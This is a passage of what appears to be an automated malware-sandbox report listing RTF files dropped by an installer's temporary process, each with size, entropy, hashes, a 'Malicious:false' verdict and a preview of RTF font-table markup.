                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\f
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):34281
                                                                                                                                                                                                                                                          Entropy (8bit):5.012287301852251
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:2aFkTZ0dW2OTYn/akt0LL32En4leo75Y3kpTBLRA6AlEayv:2aFkA0LL32EhZ/6A9O
                                                                                                                                                                                                                                                          MD5:EDED564ACC58819DE344EDCF72FC398B
                                                                                                                                                                                                                                                          SHA1:5BE5194C6D1F83EB91B5ADC4F165BF49EA393FD1
                                                                                                                                                                                                                                                          SHA-256:A036B3EA04F1F8A0C6DF8948FD2ECE8422AF95438DF6FE40AF14D46C457C387A
                                                                                                                                                                                                                                                          SHA-512:3AC8B47B305149067386772E289302033EAB223D1C1B64474268B6DE8BE444377640BCB0F852DA53FBC0B7B17F71EA84AA2CA360F9D6CB938C502B1F689A9B7F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050203
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):53477
                                                                                                                                                                                                                                                          Entropy (8bit):4.993468879548167
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4eDwJeLCdAT2njX8x3l7G5V5V5h5G5P5N58UkbdSLVMVIs2TFDtyZ12TXW++xUu:q4ZVFIA9b
                                                                                                                                                                                                                                                          MD5:E70B7387C930D96F979C15DEF4A0EF82
                                                                                                                                                                                                                                                          SHA1:9885403B2230DB0BC89F6C12A5326C28DD5C0ABB
                                                                                                                                                                                                                                                          SHA-256:2ECA499E76C966798F73BFF750D868951A1F337854402446D060919F2D10CE87
                                                                                                                                                                                                                                                          SHA-512:D37DA2B1EBF5808CBBE89163FDEEBB96E842F5FD3CC4A7523F478CA1433BF1F826F44EB219E397F8A427B4884A1987BF435D19F5C809BD06B1E7600E4FD5980C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):59300
                                                                                                                                                                                                                                                          Entropy (8bit):4.973759890149894
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqe+2VXLcpErLVYZx1M8j5g5V5V5h5G5P5N5hBcqtqYepAkVZEdvI9TMMf4fPOj/:qqqcshf4fH6IA9h
                                                                                                                                                                                                                                                          MD5:00483C12EB7B2424B5A2C264DBFBAD6F
                                                                                                                                                                                                                                                          SHA1:3038291DC4B40B6C269A24727F175504F09DD532
                                                                                                                                                                                                                                                          SHA-256:BC9B42D7D66A88398A3FFEAB5790818CCB2DF9FA4B24FC8524F86F23930A8ED4
                                                                                                                                                                                                                                                          SHA-512:04B58420762D90E1564AB6635B718FA47CB71795B743CC42FBC7B54B01D6243083C39A99B9A276F9290BC7FC4989AE0970DB35DBDBAAC92E9B80B69FBEC71693
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\f
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):80841
                                                                                                                                                                                                                                                          Entropy (8bit):4.938561816408635
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqFy4Ix1ELz8lH0RvI9uMT98i3w2EH6mlH0RvI96M0+IOq4e4ewuwPkvEaUuuSD8:qqJC08J+nMVIA94
                                                                                                                                                                                                                                                          MD5:22F333AB0A5F3E545899218EE216E751
                                                                                                                                                                                                                                                          SHA1:50AB0BCFD2E86F7FD771C7CB18346AEACF834557
                                                                                                                                                                                                                                                          SHA-256:5C6BC98349F242C511354DE1383E1F4C1D294118E300CF9DD5B0A8C937A17DD0
                                                                                                                                                                                                                                                          SHA-512:2FD3FCFC64C9E870915CE1D8830E0F69031370DA502C4158D212F42FCAFF55BD0CBBFB915AD94A193BB7DEE8426167669FBD87C932BCE4D1591D2784744EFBB5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):54989
                                                                                                                                                                                                                                                          Entropy (8bit):5.004403089561587
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:2aqAse39REjyW0ywGa2eI9Cj+uFECVCjuizCaIizg8zku0+zkuQPChJsCGJ7CdJ+:2B/i+uFEwmuizbIizg8zku0+zkugsGLZ
                                                                                                                                                                                                                                                          MD5:D8DFDDE0D2E5EE7768A3D91D9CD9D014
                                                                                                                                                                                                                                                          SHA1:4C1B8C8205715F8858FA089D887D2A49DC89EC77
                                                                                                                                                                                                                                                          SHA-256:E3409500600560293AC4C89EE3FFB02B854E9CE26926C9C592DB11979288C0BA
                                                                                                                                                                                                                                                          SHA-512:161A64A5B4F8C877661DE001A5293831D351E5294AF76F66441B6DF13AAF5976506ADD1A17F0EAE5126B72F1096AE9A745F1042BD6F9D0AA880F24C726027DF9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050203
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42635
                                                                                                                                                                                                                                                          Entropy (8bit):5.046553170453071
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqXqx1fDCcJJrNgVVhGPNhHwGNjm+epb/Vbc9DuUoU8Gmgflx6Z5zZ/6A9t:qq4e/DIA9t
                                                                                                                                                                                                                                                          MD5:60B7129A13E0CE865F60703FC49D7E1D
                                                                                                                                                                                                                                                          SHA1:96BDB21054BEE9F42FEF53360847FCE57AE3269B
                                                                                                                                                                                                                                                          SHA-256:C68038C41212344C10D0194438D8BF503F3CAB8ED9AEA1B24E91EF989CC14923
                                                                                                                                                                                                                                                          SHA-512:022BCBD14748D9C947F7B93EAC6D38D59F5BD39DFF22E62E16F1C5EC6FEF50BECA4AADE8CFBF745AF7055CEEB91F3DBB7D42117FADBE7149F627262E9654C66C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panos
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):50749
                                                                                                                                                                                                                                                          Entropy (8bit):5.025992337478631
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqFywxd/cCcJ+Lj5g5V5V5h5G5P5N5hBcqtqYepnnbxa10C0O0N0e0x0b0o0g0sq:qq/MlIA9E
                                                                                                                                                                                                                                                          MD5:4091E666BD6CCC6971AE0F510870DB42
                                                                                                                                                                                                                                                          SHA1:E21753F9D29706ECCD6371C10A0CE598C80C64D1
                                                                                                                                                                                                                                                          SHA-256:508DC3EFA99E34F0865225A43C9D2554169D4D9C9D1CE5C1CA4FEB41958DE1B5
                                                                                                                                                                                                                                                          SHA-512:C8FCF769BA2F155F8BAF4A9BF3E5D93377191EE7C02BCF5ED9E8158C10BC82B1AB344B9788D1FE81A73C18B0E2E10F0DD69C2C2400216878FA34EEDAAA824709
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):48100
                                                                                                                                                                                                                                                          Entropy (8bit):5.025830167724142
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4Fknx1eiCUYCmpNM2UrPGsGx7TYlDIUldgOQrrFrf7IPWj2sqiHTLb3ybVaGMbQ:q4giYIA9b
                                                                                                                                                                                                                                                          MD5:89ED020D20DA91E6E1F6AF7A3A4C3ED8
                                                                                                                                                                                                                                                          SHA1:B387B9E8EE99429E41090937A41D60564CA50A5A
                                                                                                                                                                                                                                                          SHA-256:29857E5F65A83CB250D7374A4AAFBCC1159C4318942F5044C9C12534A1962B41
                                                                                                                                                                                                                                                          SHA-512:1CBFA048F043D784062288EC39E5A89F74EF418CE6FBA1C2FFA32555B993C446CAC8ADB63B05D2E60FF3DB65735E55664C954D84AC4F21DDB94542BFE536F6BF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):48379
                                                                                                                                                                                                                                                          Entropy (8bit):4.996608771533116
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4e94jXjOcPI0QhhiLV9xB3T7JileOhvbNbZWvsn53NB0DNZGky8OF5x1A58GaQg:q49OUnIIA9p
                                                                                                                                                                                                                                                          MD5:B8EA7A3C55CE02A64BA0AF23B9B85E3E
                                                                                                                                                                                                                                                          SHA1:8DFFB3874BBD2EA54BE1E6D87356126B1E73F290
                                                                                                                                                                                                                                                          SHA-256:792111EFE4C09E3F68D0E2A5344ACC12D63B351BAE5F1654FCC36F2471ED7667
                                                                                                                                                                                                                                                          SHA-512:A8A46F16EC9F8CE3670B171DD90F84F9D1F6CD15FC0428E3DB95ADB4AE302D0A82FF837A9C1DD32EAEEB7D8A58F942DB79461FB5BA36C869CBF4EA7210747007
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):48785
                                                                                                                                                                                                                                                          Entropy (8bit):5.035435060271824
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqFy4a4jeDCcJ+Lj5g5V5V5h5G5P5N5hBcqtqYepnRbK3j10C0O0N0e0x0b0o0g4:qqJ9CxIA92
                                                                                                                                                                                                                                                          MD5:DC2C7249084FEEBFE9F1E4FB3491C9EA
                                                                                                                                                                                                                                                          SHA1:B1F39695D01244B8D85F9FE40D24B809759DB0FA
                                                                                                                                                                                                                                                          SHA-256:D5EE096B03118AA2E7032A80EAD45F1C1D180889E5C0D9140F5C7D999698EFBD
                                                                                                                                                                                                                                                          SHA-512:6B83FF30438154C6D58F7BA35FB6D01DA65D3B696340B522653DB3AEAD830DF67CEF61B1729197E24E8A160558418CBF639E5F31D6D2E990527C1920376FCE0B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42713
                                                                                                                                                                                                                                                          Entropy (8bit):5.047774415882159
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqXqx1fDCcJJrNgVVhGPNhHwGNjm+epbPybO9FO0I0cmG8/FRaZHIZ/6A95:qq4ePXIA95
                                                                                                                                                                                                                                                          MD5:FC56B09D7F10AE95E575F472B2CE9AB8
                                                                                                                                                                                                                                                          SHA1:806D290A16EE633A1D79B8D916FE00D508ECD51D
                                                                                                                                                                                                                                                          SHA-256:75B89487ADE95BD0450DA43B8978AB7E37AD22CAA7DEDCB9D599EEA0EE0E8A04
                                                                                                                                                                                                                                                          SHA-512:7B0948BCE8EE5AC36E7C91D3405F041973B6F9A6D316E64454E9E6A3B2A316CF65C03D1CE7041B9DD5FBEA3F94F175138735336D71CA927FB68D66D92413CC2C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panos
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44589
                                                                                                                                                                                                                                                          Entropy (8bit):5.042107887527953
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqXqx1fDCcJJrNgVVhGPNhHwGNjm+epnBBbq1FkSkek9kukBkrkSkP9MkSI6Ioum:qq4ABXIA9N
                                                                                                                                                                                                                                                          MD5:A408ECED60101314102C175C7FE3E9D7
                                                                                                                                                                                                                                                          SHA1:EBD937ECBFE7FDCC84DF27E7AEED4AC53FAA488A
                                                                                                                                                                                                                                                          SHA-256:2649AAF142678E0D5B5DBEEC454E5D04DD191CE636F6EC5231A7A633C754252C
                                                                                                                                                                                                                                                          SHA-512:B5E5B24DAF9BB0EC263E37AB11B1A66F50C3C4742F3EDB674AEF6FCA8B1F1C566D2F5CF59C9CA95779C9D055CC58B80770B9374EE605D110312F0C6E761E0BA0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
